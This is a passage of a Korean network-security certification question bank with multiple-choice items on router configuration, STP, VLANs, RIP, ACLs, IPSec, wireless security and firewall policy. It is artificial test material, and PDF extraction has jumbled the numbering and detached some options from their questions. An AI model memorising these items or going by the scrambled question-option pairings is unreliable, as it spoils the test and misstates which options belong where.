관리자가 조치하여 야 할 사항으로 바르지 못한 것은? Router#sh env all Environmental Statistics Environmental status as of 15:41:35 KST Sun Aug Data is 20 second(s) old, refresh in 40 second(s) WARNING: Lower Power Supply is NON-OPERATIONAL WARNING: Airflow temperature has reached WARNING level at 67(C) Lower Power Supply: 700W AC, OFF Upper Power Supply: 700W AC, ON No Intermittent Powerfails +12 volts measured at 12.00(V) +5 volts measured at 5.04(V) -12 volts measured at (V) +24 volts measured at 23.80(V) Airflow temperature measured at 67(C) Inlet temperature measured at 38(C) 1 운영 중인 Power Supply 두 대중 한 대는 동작상 태 이고 다른 한 대는 대기상태로 안정적인 운영 상태 이며 실내온도가 높으니 온도를 낮추어야 한 다. 146
147 2 전산실 항온항습기 온도를 조정하여 실내온도를 적 정온도로 낮춘다. 3 시스템 백업으로 안전성을 확보한다. 4 운영 중인 Power Supply 두 대 중 한 대가 Down 된 상태이므로 Power Supply 한 대를 확보하여야 한다 다음 아래의 내용 중 라우터 설정을 설명한 내용 이 바르지 못한 것은? 113. IP Routing을 순서대로 바르게 설명한 것은? 1 IP 패킷수신 목적지 IP 주소확인 목적지 네트워크 ID 확인 라우팅 테이블 검사 2 IP 패킷수신 목적지 네트워크 ID 확인 목적지 IP 주소확인 라우팅 테이블 검사 3 IP 패킷수신 라우팅 테이블 검사 목적지IP 주소확 인 목적지 네트워크 ID 확인 4 IP 패킷수신 라우팅 테이블 검사 목적지 네트워 크 ID 확인 목적지 IP 주소확인 Router#sh run Building configuration... Current configuration:! version 11.3 interface Ethernet0 ip address ip accounting output-packets no ip route-cache fair-queue ! interface Serial0 ip address no ip route-cache bandwidth 1544! ip classless! default-value exec-character-bits 8! line con 0 line vty 0 4 password F0E14 login! end 1 no ip route-cache : 기본적으로 설정된 라우팅 테 이블 외에 캐시메모리에 라우팅 주소를 남기지 않 음 2 fair-queue : 패킷을 정렬시켜서 무작위 로 전송 3 bandwidth 1544 : WAN 구간의 전용선 속도 4 ip classless : A,B,C 클래스 구분 없이 전송 112. 라우팅 프로토콜에 적용된 Access-List에서 Source IP address 만을 가지고 패킷의 전송 여부를 판단하는 것을 무엇이라 하는가? 1 Standard Access-List 2 Extended Access-List 3 MAC Address Access-List 4 Protocol Type Code Access-List 114. STP(Spanning Tree Protocol) Switch의 포트 상태 중 올바르지 않는 것은? 1 Blocking : 스위치의 기본 설정으로 프레임을 포워 드하지 않고 BPDU를 수신한다. 2 Listening : BPDU를 수신하여 프레임을 전달하기 전에 네트워크에 루프 발생 여부를 확인한다. 3 Learning : MAC 어드레스를 학습하여 필터 테이블 을 구성하나 프레임은 포워드하지 않는다. 4 Filtering : 수신된 프레임을 포워딩할 것인지 폐기 할 것인지 결정한다 스위치가 발신지 하드웨어 어드레스를 모를 경우 및 필터 테이블에 없는 프레임을 수신한 경우에 처리 방법은? 1 이용 가능한 인터페이스 중 가장 가까운 링크로 전 달한다. 2 프레임을 폐기한다. 3 MAC(Media Access Control) Address를 계속 필터 링한다. 4 Input 프레임의 목적지 주소가 있는 네트워크에 forward 한다 LAN(Local Area Network) 스위치 방식 중 프레임 을 전송하기 전에 512bit가 수신 될 때까지 대기하고 내용에 이상이 없으면 전송하는 스위칭 방식은? 1 Cut through 2 Store and forward 3 Fragment check 4 Fragment free 147
148 117. STP(Spanning Tree Protocol)를 운용하는 네트워 크에 새로운 스위치를 추가하여 네트워크 토폴로지가 변경된 경우 스위치의 포트들은 어떤 상태가 되는가? 123. 네트워크에서 스위치는 각 장치에서 보낸 프레임 을 전달한다. 여기서 스위치가 처리하는 주된 기능을 무엇이라 하는가? 1 Blocking, Forwarding 3 Designation 2 Listening, Learning 4 Forwarding, Learning 1 Broadcast domain 2 Collision domain 3 Server domain 4 Access domain 118. 네트워크에서 루프방지책을 고려하지 않았을 경 우 발생하는 문제점들을 모두 고르시오? 1 Broadcast storm 2 다중프레임 복제 3 메시지 전송 시간 향상 4 고속 패킷 스위칭 124. 단일 링크로 구성된 네트워크에서 VLAN 트래픽 을 통과시키기 위해 라우터와 스위치 사이 또는 스위 치 사이에서 필요한 것으로 프레임이 어떤 VLAN에 속 해 있는지를 식별하기 위해 사용하는 기능은 무엇인 가? 119. 다음 보기 중 전송되는 호스트의 버퍼가 Over Flowing 하는 것을 방지하는 기능은? 1 Tagging 3 ARP 2 Trunk 4 Filtering 1 Segmentation 3 Distribution 2 Acknowledgments 4 Flow Control 125. 다음 중 IEEE의 프레임 Tagging을 위한 표준 방 법은 무엇인가? 120. RIP(Routing Information Protocol)는 Distance Vector 라우팅 알고리즘을 사용하고, 매 30초마다 모 든 전체 라우팅 테이블을 Active Interface로 전송한다. 다음 원격 네트워크에서 RIP에 의해 사용되는 최적의 경로 결정 방법은 무엇인가? 1 TTL(Time To Live) 2 Routed Information 3 Count to information 4 Hop count 121. RIP Routing 환경의 Network에서 16 hops metric이 의미하는 것은 무엇인가? 1 최대 hop 수 2 Router 수 3 전송 hops의 수 4 16 hops-unreachable 122. VTP 서버로부터 정보를 수신하며 업데이트를 송 수신하고 변경은 할 수 없으며, VTP 서버가 새로운 VLAN의 클라이언트 스위치를 통보하지 않는 한 새로 운 VLAN에 클라이언트 스위치의 포트를 추가할 수 없 다. 다음 설명에 속하는 VTP 운영 모드는? q z a 126. 라우터(s0)와 DTE, DCE 장비 간에 인터페이스 연 결 상태를 보여주는 명령은? 1 sh int s0 2 sh int serial 0 3 sh controllers s 0 4 sh line s 네트워크에 어떤 패킷이 유입되면 패킷의 헤더를 검사하여 보안 정책 적용 및 목적지 주소로 전송 유무 를 결정하는 장비는? 1 브릿지(Bridge) 2 스크린 라우터(Screen Router) 3 허브(HUB) 4 게이트웨이(Gateway) 1 Server configuration 2 Client configuration 3 Transparent configuration 4 Server Transaction configuration 148
149 128. Access-List는 라우터를 통과하는 패킷을 검사하 여 전송할 것인지 폐기할 것인지 여부를 결정하는데 사용된다. Access-List의 동작 과정을 설명한 것 중 맞 지 않은 것은? 1 패킷이 입력되면 패킷의 라우팅(Routing)과 브릿징 (Bridging) 여부를 판단한다. 2 패킷의 헤더에서 목적지 주소를 식별하여 MAC 테 이블의 네트워크 정보와 비교한다. 3 Access-List에 의해 패킷 식별을 시작한다. 4 식별된 패킷을 통과할 것이지 거부할 것인지 분류 한다 VLAN(Virtual LAN)이란 네트워크 노드들의 물리 적인 위치와 상관없이 다수의 노드들을 논리적인 구성 단위인 브로드캐스트 도메인으로 세그먼트를 나누어 그룹을 구성하는 방식을 말하며 VLAN을 사용하면 세 그먼트간의 트래픽을 줄일 수 있으며 더미허브를 사용 하는 것에 비해 보안에 우수하다. 다음 중 이런 VLAN 을 나누는 방식이 아닌 것은 무엇인가? 1 장비의 하드웨어 장치 번호를 기준으로 VLAN 구성 2 물리적인 스위치의 포트를 기준으로 VLAN 구성 3 디바이스들의 MAC 주소를 기준으로 VLAN 구성 4 사용자가 정의한 IP 주소를 기준으로 VLAN 구성 129. 다음 설명은 무엇을 말하는가? [작은 규모의 Network A와 많은 네트워크 정보를 가진 Network B 가 라우터 R1과 R2로 접속되어 있다. 그리고 Routing Information 을 주고받을 수 있도록 R1과 R2에 각각 Routing Protocol을 활성 화하였다. Network A에서 R1을 거쳐 외부로 나가고자 할 때 모두 라우터 R2를 통해 나간다면 R1은 default route로 R2를 지정하는 것이 바람직하다. 그리고 R1에서는 Network A에 대한 정보를 R2 로 전달할 필요가 있으나, R2에서 갖고 있는 많은 정보를 R1로 전 달하지 않아도 된다. 따라서 R1과 R2에서는 각각 Routing Protocol을 활성화하고, R2에서는 R1로부터 오는 Routing Information을 받되, R2에서 R1로 Routing Information을 주지 않 도록 하는 방법을 사용하는 것이 바람직하다.] 1 Passive Interface 2 Loopback Interface 3 Null Interface 4 Ethernet Interface 130. 라우터의 패킷 버퍼와 라우팅 테이블을 저장하는 데 사용되는 메모리는? 1 Flash 2 RAM 3 ROM 4 NVRAM 131. 네트워크로 들어오는 ICMP를 모두 허용할 경우 네트워크 매핑이나 해킹 툴의 통신 채널로 사용되는 등 보안상 문제점을 발생시킨다. 그러나 이를 모두 차 단할 경우, 내부 네트워크에서 사용하는 몇몇 서비스 의 제약을 받는데 다음 중 이에 해당하지 않는 것은? 1 호스트의 ping 명령 2 윈도우 호스트의 tracert 명령 3 유닉스 호스트의 traceroute 명령 4 라우터의 (목적지 호스트까지) 최적경로 발견 133. 다음 중 어떤 IP 대역이 사설 IP 주소 범위에 속 하는가? 다음 중 브리지와 라우터에 대한 설명 중 잘못 설명된 것은 무엇인가? 1 브리지는 모든 포트에 대해 동일한 네트워크 주소 를 사용하고 라우터는 포트마다 서로 다른 네트워 크 주소를 부여한다. 2 브리지는 브로드캐스트 패킷을 전송하지만 라우터 는 전송하지 않는다. 3 브리지는 패킷의 헤더정보를 읽거나 변경하지 않지 만 라우터는 각 프레임에 새로운 헤더를 생성한다. 4 브리지는 MAC주소에 근거하여 전송테이블을 작성 하고, 라우터는 IP주소에 근거하여 라우팅 테이블 을 작성한다 ICMP는 두 호스트간에 또는 하나의 호스트와 라 우터 같은 네트워크 장비사이에서 에러 메시지를 주고 받을 때 사용된다. ICMP에서 악성으로 사용되어지는 ICMP 메시지의 타입 중에 한 가지는 "ICMP redirect" 이다. ICMP Redirect 메시지는 호스트가 목적지 주소 로 연결 하고자 할 때, 해당 라우터가 최적의 경로임 을 호스트에게 알려주기 위하여 ( )로부터 ( )로 보내 어지는데 이를 이용하여 해커는 시스템의 정보를 획득 할 수 있다. 다음 중 ( )에 들어갈 말로 적절한 것은? 1 라우터 - 호스트 2 라우터 - 라우터 3 호스트 - 라우터 4 호스트 - 호스트 149
150 136. OSI 7 Layer 중 세션 레이어는 두 컴퓨터 사이의 연결 생성, 데이터 전송중의 연결 유지, 연결 해제의 통제를 담당한다. 다음 중 세션 레이어에서 동작하는 프로토콜이 아닌 것은? 1 SQL(Structured Query Language) 2 RPC(Remote Procedure Call) 3 SSL(Secure Sockets Layer) 4 TFTP(Trivial File Transfer Protocol) 137. 네트워크 장비를 관리하기 위하여 만들어 졌으나 해커에 의해 시스템 정보를 획득하거나 네트워크 구성 을 파악하는데 이용되는 프로토콜의 이름과 이 프로토 콜의 읽기 전용 기본 Community String은? 1 ping, secret 2 finger, public 3 SNMP, public 4 netbios, secret 138. OSI 7 계층에서 암호화가 적용되지 않는 계층은 다음 중 무엇인가? 1 네트워크 계층(Network Layer) 2 물리 계층(Physical Layer) 3 세션 계층(Session Layer) 4 데이터 링크 계층(Data Link Layer) 141. SSL은 HTTP를 이용하는 웹 상에서 데이터를 보 호하기 위한 수단으로 일반적으로 사용되고 있는데 다 음 중 OSI/ISO 모델 중 SSL 프로토콜이 작동하는 계층 은 다음 중 어느 것인가? 1 응용/전송 계층(Application/Presentation Layer) 2 응용/세션 계층(Application/Session Layer) 3 응용/데이터 링크 계층(Application/Data Link Layer) 4 응용/네트워크 계층(Application/Network Layer) 142. IPv6는 차세대 IP라고도 불리고 있으며 IETF 공식 규격이다. IPv4에 비해서 여러 가지 향상된 기능을 포 함하고 있는데 다음 중 IPv4와 비교한 IPv6의 특징이 아닌 것은 무엇인가? 1 보안 기능이 추가되어 있다. 2 IP 주소의 길이가 32 비트에서 256 비트로 늘어나 서 IP 부족을 해소할 수 있다. 3 서비스품질(QoS)기능을 제공한다. 4 Mobile IP 및 가전용 IP 기능을 제공한다 IPSEC는 단 대 단 IP 계층 보안 프로토콜을 제공 하기 위한 개방 구조의 프레임워크로서 IP의 취약점을 보완하기 위한 보안 기능을 제공한다. 다음 중 어떤 IPSEC 작동 모드가 IPSEC 패킷에 포함된 전체 데이터 를 암호화하게 되는가? 139. ICMP 프로토콜의 주요 임무는 오류를 보고하는 기능인데 다음 중 ICMP의 오류보고 기능과 관련되어 서 틀린 내용은 무엇인가? 1 Tunnel mode 3 Safe mode 2 Transport mode 4 Normal mode 1 ICMP는 오류 메시지를 전달하는 데이터그램에 대 해서는 오류메시지를 생성하지 않는다. 2 멀티캐스트 주소를 가진 데이터그램에 대해서는 오 류 메시지를 생성하지 않는다. 3 예약된 주소(사설망)에 대해서는 오류 메시지를 생 성하지 않는다. 4 단편화된 데이터그램에 대해서는 오류메시지를 생 성하지 않는다 OSI/ISO 계층에서 SOCKS 서버가 운영되는 계층 은 무엇인가? 144. 다음 중 IPSEC 프로토콜에서 IKE 프로토콜의 역 할은 무엇인가? 1 대상 인증과 키 교환 2 데이터 암호화 3 데이터 서명 4 QoS 145. 다음 중 IPSEC의 주요 부분이 아닌 것은? 1 Authentication Header 2 Encapsulating Security Payload 3 Key Distribution Center 4 Internet Key Exchange 1 응용 계층(Application Layer) 2 전송 계층(Transport Layer) 3 네트워크 계층(Network Layer) 4 데이터 링크 계층(Data Link Layer) 150
151 146. 다음 중 무선 통신에서 사용되는 보안 프로토콜 로 WAP 프로토콜을 사용하는 보안 프로토콜은 무엇 인가? 1 WSP 2 WDP 3 WTLS 4 SHTTP 147. 무선 네트워크를 안전하게 설정하는 방법 중 잘 못된 것은 무엇인가? 1 AP(Access Point)의 위치는 외부에 접한 벽이나 창 쪽에서 먼 건물 안쪽에 설치한다. 2 AP를 침입차단시스템 안쪽에 둔다. 3 AP의 관리용 ID 이름을 추측하기 어렵게 설정한다. 4 AP에 MAC 주소 필터링 기능을 설정한다 무선랜에서 전송되는 패킷을 암호화하기 위해 사 용되는 프로토콜로 WEP 프로토콜이 있다. 다음은 WEP 프로토콜에 대한 설명으로 이 중 잘못 설명된 것 은 무엇인가? 1 WEP은 구현하기가 매우 쉽다. 2 WEP은 무선랜 어플리케이션에 기본적인 수준의 보 안을 제공한다. 3 WEP은 단독이 아닌 AP(Access Point)에 구현이 되 어야 효력을 발생한다. 4 WEPcrack 등의 프로그램으로 인해 WEP 키 해독이 가능하다 다음은 네트워크 토폴로지 중 어느 것에 대한 설 명인가? 중앙의 허브를 통해 연결한다. 허브의 포트가 허용하는 한 간단히 확장할 수 있다. 네트워크 상의 노드에 문제가 생겨도 전체 네트워크에 는 영향이 생기지 않는다. 1 버스형 2 링형 3 스타형 4 망형 152. 다음 중 버스 토폴로지에 대한 설명이 아닌 것 은? 1 하나의 케이블에 분기를 만들어 각 노드를 연결한다. 2 터미네이터(Terminators)를 사용한다. 3 한쪽 방향으로만 데이터가 전송된다. 4 케이블에 문제를 일으키면 위치를 찾기 어렵다 다음 중 스타 토폴로지에 대한 설명이 아닌 것 은? 1 중앙의 허브를 통해 연결되어 허브를 중심으로 100m 이내에 노드들이 존재해야 한다. 2 허브의 포트가 허용하는 한 간단히 확장할 수 있다 3 케이블에 문제를 일으키면 위치를 찾기 어렵다. 4 설치 및 재구성이 용이하다 최근 이슈가 되고 있는 무선랜 해킹과 관련되어 해커가 무선 네트워크를 찾기 위해 무선 장치를 가지 고 주위의 AP(Access Point)를 찾는 과정을 말하며 무 선랜 해킹과 정의 초기 단계에 사용되는 방법을 나타 내는 말은 무엇인가? 1 War Driving 2 Spoofing 3 War Dialing 4 Sniffing 150. 무선랜 가입자의 상호인증 방법과 무선 접속구간 보안에 필요한 마스터 세션키를 동적으로 분배하기 위 한 방법을 정의한 규격으로 802.1x가 있다 x의 주요 특징에 해당하지 않는 것은 무엇인가? 1 정적인 세션 key관리 2 port기반의 무선랜 접속 제어 3 사용자 기반 인증: NAI(Network Access Identification) 4 인증 방식의 확장성: EAP(Extensible Authentication Protocol) 사용 154. ISO/OSI 참조 모형에서 데이터 암호화가 사용되 지 않은 계층은? 1 Physical layer (물리 계층) 2 Session layer (세션 계층) 3 Application layer (어플리케이션 계층) 4 Data link layer (데이터 링크 계층) 155. 다음 중 모뎀을 통한 다이얼업(Dial-up) 방식으로 접근이 가능한 시스템에서 비인가 된 접근을 차단하기 위한 가장 강력한 방법은 무엇인가? 1 사전에 승인된 전화번호만을 사용한다. 2 SSO를 사용한다. 3 아이디를 정기적으로 변경한다. 4 다이얼 백 방식을 사용한다. 151
152 156. 공용 네트워크를 이용해서 내부 네트워크에 접속 하는 경우 다이얼업 방식에 의한 적절한 통제가 필요 하다. 이때 다이얼업 방식에 대한 접근 통제에 해당하 지 않는 것은? 1 시스템에 SSO 기술 사용 2 다이얼 백 회선 사용 3 접근 통제 소프트웨어 사용 4 운영자가 호출인의 신분을 확인한 이후 연결 157. 서버 접근 관련 보안 설정에 관한 설명이다. 다 음 설명 중 옳지 않은 것은? 1 접속 대상 IP 범위 설정 및 접근 제한 설정 2 remote root 로그인 제한 3 root 사용자 ftp 직접 접근 허용 4 NFS 사용 시 everyone으로 공유 금지 158. 일반적으로 DMZ에 위치하며 Anonymous FTP, 웹, DNS, SMTP, Proxy 서버 등과 같이 외부에 서비스 를 제공하기 위하여 보안성을 향상시킨 서버들을 통칭 하여 무엇이라 하는가? 1 Viruswall 2 IDS 3 Bastion Host 4 Dual-homed Gateway 159. 유닉스 시스템에서 X-window로 인하여 리모트에 서 접근할 수 있는 많은 취약점이 발생하고 있다. X-window 접근 제어를 위해 침입차단시스템에서 접근 제어를 해야 할 포트는? xxxx 보안상 취약한 서비스인 telnet, ftp 서비스의 접 근 제어 설명으로 옳지 않은 것은? 1 Network Device의 ACL을 설정하여 접근제어 설정 을 한다. 2 TCP-wrapper를 사용하여 접근 대상 호스트에 접근 제어 설정을 한다. 3 침입차단시스템에 접근제어를 설정하여 접근대상 호스트를 제한한다. 4 침입탐지시스템 접근제어를 설정하여 접근대상 호 스트를 제한한다 프록시로 서버의 보안을 향상시킬 수 있다. 하지 만 프록시로 인해 단점이 발생되기도 한다. 다음 중 프록시의 단점에 대한 설명이 아닌 것은? 1 프록시 서버에 불필요한 트래픽을 사전에 제한하지 못한다. 2 프록시 서비스는 서버 서비스가 많을수록 각각의 서비스를 위한 다양한 프록시 소프트웨어가 필요 하다. 3 프록시 서비스는 일부 복잡한 서비스에 대해서는 작동하지 않는다. 4 보안레벨에서의 침입차단시스템과 침입차단시스템 간의 암호화된 통신을 지원한다 다음 중 프록시(Proxy)서버 사용 시 얻을 수 있는 이점이 아닌 것은? 1 외부에 대하여 내부 시스템의 정보를 숨길 수 있다. 2 강력한 인증 기능과 로깅 기능을 사용할 수 있다. 3 Telnet 및 FTP 필터링 방식의 접근제어를 할 수 없다. 4 좀 더 넓은 의미의 패킷 필터링이 가능하다 다음 중 어플리케이션 게이트웨이(Application Gateway)의 가장 큰 장점은 무엇인가? 1 응용 계층을 완벽하게 인식하여 제어한다. 2 성능(Performance)이 향상된다. 3 확장성이 좋다. 4 모든 응용 프로그램을 제어할 수 있다 어플리케이션 프록시 게이트웨이(Application Proxy Gateway)는 각 서비스별 Proxy Daemon이 있어 IP 주소 및 TCP port를 이용하여 네트워크 접근 제어 를 할 수 있으며 사용자 인증 및 파일 전송 시 바이러 스 검색 기능과 같은 부가서비스를 지원한다. 어플리 케이션 프록시 게이트웨이의 설명 중 맞지 않은 것은? 1 내부시스템과 외부시스템 간에 Proxy를 통해서만 연결이 허용된다. 2 Security key, Secure ID 등 일회용 패스워드를 이 용한 강력한 인증기능을 제공한다. 3 어플리케이션 계층에서 동작함으로써 다른 방식에 비해 성능이 우수하다. 4 새로운 서비스를 제공하기 위해서는 새로운 Proxy Daemon이 필요하다. 152
153 165. 다음 설명에 가장 적당한 것을 고르면? (외부 서버 접속 시 연결을 대행해 주는 기능을 하는 서버로, 디폴트 상태로 운영될 경우 임의의 TCP 포 트에 대한 연결을 허용하여 공격자의 출발지 주소를 감추거나 스팸 릴레이 등에 이용되는 취약점이 존재 한다.) 1 프록시 서버 2 브릿지 3 허브 4 침입차단시스템 166. 프록시 형태의 침입차단시스템은 OSI 7 Layer의 어느 계층에서 동작하는가? 1 4 (전송 계층) 2 5 (프리젠테이션 계층) 3 6 (세션 계층) 4 7 (응용 계층) 167. 공개용 침입차단시스템에 대한 설명 중 옳지 않 은 것은? 1 공개용 침입차단시스템을 운영하기 위해서 관리자 가 전문기술을 가지고 접근제어를 설정하는 것이 필요하다. 2 리눅스용의 경우 소스가 공개되는 것들이 있어 이 소스를 직접 수정할 수 있는 장점을 가진다. 3 공개용 침입차단시스템은 기술지원을 받기가 쉽지 않다. 4 여러 종류의 다중 침입차단시스템 설치를 통한 대 규모 네트워크 구성 시 유용하게 사용된다 침입차단시스템을 운영하기 위한 기능적 고려사 항이 아닌 것은? 1 장애의 단일 지점에 대한 대비책 2 IP & DNS spoofing 3 바이러스 탐지 4 telnet, ftp 등의 clear text를 사용한 접속의 제한 169. 침입차단시스템을 운영하기 위한 기술적 고려사 항이 아닌 것은? 1 내부 혹은 외부로부터의 접근 제어 2 서비스 거부 공격에 대한 대책 3 최근 공격 기술 및 경향 4 암호화된 패킷의 복호화 170. 침입차단시스템 운영 시 고려해야 할 사항이 아 닌 것은? 1 침입차단시스템 운영을 위한 정책이 문서화되어야 한다. 2 침입차단시스템 정책은 숙련된 운영자에 의하여 설 정되어야 한다. 3 침입차단시스템의 신뢰성에 대한 요구사항이 명시 화되어야 한다. 4 외부에서 들어오는 패킷에만 초점을 맞추어도 된 다 조직의 정보 자산을 보호하고 외부로부터 일차적 으로 유해 정보를 차단하기 위한 정책과 이를 지원하 는 하드웨어 및 소프트웨어를 무엇이라 하는가? 1 침입탐지 시스템(Intrusion Detection System) 2 프록시(Proxy) 3 침입차단시스템(Firewall) 4 DNS 서버 172. 침입차단시스템의 기술적인 구성 요소가 아닌 것 은? 1 스크린 라우터 2 가상 사설망 3 배스천 호스트 4 프록시 서버 173. 침입차단시스템 접근 통제 리스트는 특정 파라미 터를 기반으로 접근을 통제한다. 다음 중 그 파라미터 에 속하지 않는 것은? 1 포트(Port) 2 서비스 형태 3 네트워크 인터페이스 카드(NIC) 4 IP address 174. IP/Protocol Filtering 방식의 침입차단시스템 (Firewall)에서 구성하는 주요기능이 아닌 것을 모두 고 르면? 1 IP 접근 제어 설정, 포트 제어 설정, 프로토콜 필터 링(Protocol Filtering) 2 어플리케이션 게이트웨이(Application Gateway) 방 식의 어플리케이션 차원의 접근 제어 설정 3 확장된 로그 기능 4 패킷 스위칭(Packet Switching) 방식의 패킷 접근 제어 설정 153
154 175. 일반적인 침입차단시스템 운영 정책 중 올바르지 않은 것은? 1 침입차단시스템에는 불필요한 모든 서비스를 제거 한다. 2 침입차단시스템 정책과 구성은 정확하게 문서화되 어야 한다. 3 침입차단시스템 정책을 모두가 인지하도록 공개한 다. 4 침입차단시스템은 정기적으로 감사를 받아야 한다 침입차단시스템 설계와 구현 전략이 미치는 영향 과 가장 거리가 먼 것은? 1 네트워크 보안에 대한 상세 정보의 파악과 그 대응 조치 2 내외의 보안 감사에 초점 3 내부에서 발생하는 공격 위협을 현저히 감소시킬 수 있는 기회 4 문서화되지 않은 연결을 근절하고 모든 원격 (remote) 접근을 명문화된 정책에 따르게 할 기회 177. 시스템으로의 불법적인 접근을 막기 위해 설치하 는 침입차단시스템의 종류가 아닌 것은? 1 패킷 필터링 2 Hybrid 방식 3 Session Gateway 4 Stateful Inspection 방식 178. 다음 중 일반적으로 침입차단시스템에서 필터링 하도록 권고되고 있는 포트로 맞게 짝지어진 것은? 1 tftpd, ssh, smtp 2 lpd, kerberos, dns 3 nfs, http, telnet 4 sunrpc, X-windows, lpd 179. 전통적인 침입차단 시스템(Firewall)의 한계가 아 닌 것은? 1 허가된 서비스에 대한 검사 2 내부사용자의 불법적인 행동과 외부 해킹에 대한 대처 3 허용된 사용자나 서비스에 대한 불법적인 변조에 대한 대처 4 접근 제어와 로깅 및 감사 추적 180. 침입차단시스템(Firewall)의 구현 방식에 대한 설 명으로 옳은 것은? 1 Packet Filtering 방식과 Proxy 방식 중 Proxy 방식 이 투명성을 좀 더 제공한다. 2 Packet Filtering 방식은 IP Spoofing에 대한 대비책 이 될 수 있다. 3 Proxy 방식은 다른 방식보다 유연성이 높아 새로운 취약점에 대응이 빠르다. 4 침입차단시스템은 내부의 불법적인 사용자에 의한 내부망 공격에 대한 보안 접근제어 설정하기가 어 렵다 침입차단시스템 접근 제어 설정 시 일반적으로 Filter 해야 하는 것이 아닌 것은? 1 tftp 2 lpd 3 dns 4 rpc 관련 서비스 182. 침입차단시스템 설치 시 일반적으로 DMZ를 구현 한다. DMZ를 구성하는 가장 중요한 이유는 무엇인가? 1 외부 네트워크 트래픽 제어 2 내부 네트워크 트래픽 제어 3 내부를 외부 네트워크로부터 독립시켜 침입차단시 스템 정책에 제한을 받지 않기 위한 접근 제어 4 외부의 직접적인 접근으로부터 내부 네트워크에 대 한 접근 통제 183. 침입차단시스템 설정에 대한 설명이다. 다음 중 옳지 않은 것은? 1 사설 IP로 침입차단시스템을 구성한다. 2 DMZ에 침입차단시스템을 설치한다. 3 외부 비인가자에 대한 데이터 노출을 최소화시킨 다. 4 소프트웨어 접근 제한만을 구성한다 프록시 형태의 침입차단시스템에서 별도의 프록 시 프로그램이 필요 없는 서비스는? 1 HTTP 서비스 2 Telnet 서비스 3 FTP 서비스 4 DNS 서비스 154
155 185. 일반적인 침입차단시스템 정책 중 올바르지 않는 것은? 1 모든 인터넷 접속은 침입차단시스템을 통해서 이루 어진다. 2 기본적으로 명시되지 않은 모든 서비스는 금지된 다. 3 모든 부서가 동일한 정책에 의해 접근 통제되어야 한다. 4 기본적으로 대부분 통신은 허용된다. 3 공격 대비 능력, 가격대 성능비, 호환성에 대한 고 려 4 리포팅 등과 같은 침입차단시스템 운용적 측면 고 려 190. 다음의 IP 중 침입차단시스템에서 일반적으로 Filter되어야 할 IP가 아닌 것은? 침입차단시스템(Firewall)을 통과하는 모든 패킷을 침입차단시스템에서 정의한 보안정책에 따라 패킷의 통과 여부를 결정하는 역할을 수행하는 기법은 무엇인 가? 1 Packet Filtering 2 NAT(Network Address Translation) 3 Proxy 4 logging 187. 침입차단시스템(Firewall)을 지나는 패킷에 대해 출발지와 목적지의 IP 주소 및 포트 번호를 선택적으 로 변경하는 기능을 무엇이라 하는가? 1 Gateway 2 Packet Filtering 3 NAT(Network Address Translation) 4 NAU(Network Address Unit) 191. 아래의 위협 중 침입차단시스템이 감소시키기 가 장 어려운 것은? 1 외부 해커로부터의 공격 2 외부 비인가자에 의한 정보의 유출 3 외부 사용자의 허가되지 않은 서버의 접속 시도 4 내부 비인가자에 의한 악의적인 정보의 유출 192. 침입차단시스템에서 rlogin이나 NFS와 같은 서비 스에 대해 제어하기 어려운 이유는? 1 rlogin이나 NFS는 프록시 서버가 없기 때문이다. 2 rlogin이나 NFS 서비스는 hostname을 사용해서 인 증하기 때문이다. 3 rlogin이나 NFS가 사용하는 port 번호가 가변적이 기 때문이다. 4 rlogin이나 NFS가 broadcast 서비스이기 때문이다 침입차단시스템(Firewall)은 프록시를 적용하여 어 플리케이션 계층까지 보안을 강화할 수 있다. 다음 프 록시 기능을 설명한 것 중 올바르지 않은 것은? 1 메일 서비스(SMTP) 제어 2 웹 서비스(HTTP) 제어 3 파일 전송 서비스(FTP) 제어 4 서비스 거부 및 탐지 193. 다음 중 침입차단시스템의 약점이 아닌 것은? 1 침입차단시스템이 Crash되면 네트워크 전체에 영향 을 미친다. 2 바이러스와 같은 것은 방어하기 힘들다. 3 DMZ를 위한 별도의 IP 대역이 필요하다. 4 네트워크를 경유하지 않는 패킷은 제어할 수 없다 침입차단시스템에 대한 설명 중 옳지 않은 것은? 189. 침입차단시스템 도입 시 고려 사항이 아닌 것은? 1 송수신 패킷에 대하여 인증(Authentication), 무결성 (Integrity), 기밀성(Confidentiality)에 대한 보장 여 부 2 처리량, 초당 접속, 동시 접속 세션, 암호화 처리 능력 등의 운영망의 규모가 요구하는 성능을 갖는 Firewall 1 인터넷을 통한 침입차단 기능 2 공유폴더 침입차단 기능 3 네트워크 사용 내용 저장 기능 4 일반 계정에 대한 접근제어 설정을 할 수 있는 기능 155
156 195. 침입차단시스템 방식 중 처리속도 면에서 가장 성능이 좋은 것은? 1 Bastion Host 2 Screened Host Architecture 3 Dual Homed Host Architecture 4 Packet Filtering 196. 침입차단시스템 종류 중 Application Proxy를 두 고 세션 연결 시 해당 서비스별 인증을 수행하고 인가 된 세션에 한해 서비스를 허용하는 방식은 무엇인가? 1 Packet Filtering 방식 2 Hybrid 방식 3 Proxy 방식 4 Application Gateway 방식 197. 침입차단시스템(Firewall) 운영 시 주의 깊게 확인 해 봐야 할 패킷 필터링에 대한 몇 가지 규칙이 있다. 침입차단시스템(Firewall) 운영 시 특별한 예외정책이 아니라면 정책 설정 시 적용해야 할 표준 방어정책으 로 맞지 않은 것은? 1 내부 주소로부터 출발하는 인바운드(inbound) 트래 픽을 거부한다. 2 내부 주소로부터 나오지 않는 아웃바운드 (outbound) 트래픽을 거부한다. 3 브로드캐스트 및 멀티캐스트와 같은 출발지 주소는 허용해도 된다. 4 합리적인 크기(수 Kbytes)를 넘은 ICMP 트래픽을 거부한다 침입탐지시스템(Firewall) 운영 시 불필요한 모든 서비스를 사용할 수 없도록 하는 것은 상당히 중요하 다. 몇몇 서비스는 특히 위험하고 침입차단시스템에서 거의 필요로 하지 않는 서비스들이다. 이와 관련된 설 명으로 옳지 않은 것은? 1 베스천 호스트가 NFS를 이용하여 내부 컴퓨터의 디스크를 마운트 할 수 있게 하면 편리하고 안전 한 시스템 구성이 될 수 있다. 2 원격 프로시저 호출(RPC, Remote Procedure Call) 에 기반한 다른 서비스들도 사용할 수 없도록 해 야 한다. 3 베스천 호스트는 bootp, ftpd 등의 부팅 서비스를 제공하지 말아야 한다. 4 BSD r 명령어 서비스와 같은 것들을 사용할 수 없 도록 해야 한다 어느 인터넷 회사에서 베스천 호스트에 새로운 서비스를 설치하고자 할 경우 가능한 안전하게 설치, 운영되어야 한다. 설치, 운영 시 점검해야 할 작업에 대한 설명으로 옳지 않은 것은? 1 파일 권한을 가능한 한 제한해야 한다. 2 만약 프로그램에 사용자 계정을 설치해야 할 필요 가 